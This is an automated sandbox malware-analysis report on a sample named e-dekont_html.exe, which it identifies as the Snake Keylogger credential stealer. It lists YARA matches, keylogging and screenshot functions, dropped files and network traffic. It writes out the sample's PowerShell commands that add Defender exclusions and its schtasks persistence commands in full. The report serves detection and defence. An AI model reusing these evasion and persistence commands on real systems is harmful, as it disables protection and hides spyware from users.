                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61282 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61290 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_012BD57C0_2_012BD57C
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_076B65080_2_076B6508
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_076B07400_2_076B0740
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_076B0C500_2_076B0C50
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F000400_2_08F00040
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F034B80_2_08F034B8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F0EAE00_2_08F0EAE0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F0EF190_2_08F0EF19
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F0F3600_2_08F0F360
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F034A80_2_08F034A8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F066730_2_08F06673
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F066780_2_08F06678
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BED2788_2_02BED278
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE53628_2_02BE5362
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE71188_2_02BE7118
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEC1478_2_02BEC147
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEC7388_2_02BEC738
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEC4688_2_02BEC468
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BECA088_2_02BECA08
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE69A08_2_02BE69A0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEE9888_2_02BEE988
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BECFAA8_2_02BECFAA
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BECCD88_2_02BECCD8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE9DE08_2_02BE9DE0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEF6318_2_02BEF631
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEFA888_2_02BEFA88
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE29E08_2_02BE29E0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BEE97A8_2_02BEE97A
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE3E098_2_02BE3E09
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_02B6D57C9_2_02B6D57C
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072321069_2_07232106
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072334B89_2_072334B8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072366699_2_07236669
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072366789_2_07236678
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_0723EF289_2_0723EF28
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_0723EAF09_2_0723EAF0
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072334A89_2_072334A8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_0723F3609_2_0723F360
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072557889_2_07255788
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_072507409_2_07250740
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 9_2_07250C509_2_07250C50
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159C14613_2_0159C146
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159536213_2_01595362
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159D27813_2_0159D278
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159C46813_2_0159C468
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159C73813_2_0159C738
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159E98813_2_0159E988
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_015969A013_2_015969A0
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_01593B9513_2_01593B95
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159CA0813_2_0159CA08
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_01599DE013_2_01599DE0
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159CCD813_2_0159CCD8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_01596FC813_2_01596FC8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159CFAA13_2_0159CFAA
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_01593E0913_2_01593E09
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159F63113_2_0159F631
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159E97A13_2_0159E97A
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_015929EC13_2_015929EC
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_0159FA8813_2_0159FA88
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_01593AA113_2_01593AA1
                Source: e-dekont_html.exe, 00000000.00000002.1764677520.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1777940710.0000000007740000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1769422089.0000000002D08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1776779283.0000000005E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1769422089.0000000002C41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1778649683.0000000008C6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003EDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000008.00000002.4158733211.0000000000EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs e-dekont_html.exe
                Source: e-dekont_html.exeBinary or memory string: OriginalFilenamebbvK.exeP vs e-dekont_html.exe
                Source: e-dekont_html.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: e-dekont_html.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fahKSvwo.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, gAT7eoJMygn6gjWsIx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, gAT7eoJMygn6gjWsIx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile created: C:\Users\user\AppData\Roaming\fahKSvwo.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMutant created: \Sessions\1\BaseNamedObjects\LhOILbfZuhSGjtSJxZaY
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7653.tmpJump to behavior
                Source: e-dekont_html.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: e-dekont_html.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: e-dekont_html.exeReversingLabs: Detection: 63%
                Source: e-dekont_html.exeVirustotal: Detection: 67%
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile read: C:\Users\user\Desktop\e-dekont_html.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\fahKSvwo.exe C:\Users\user\AppData\Roaming\fahKSvwo.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
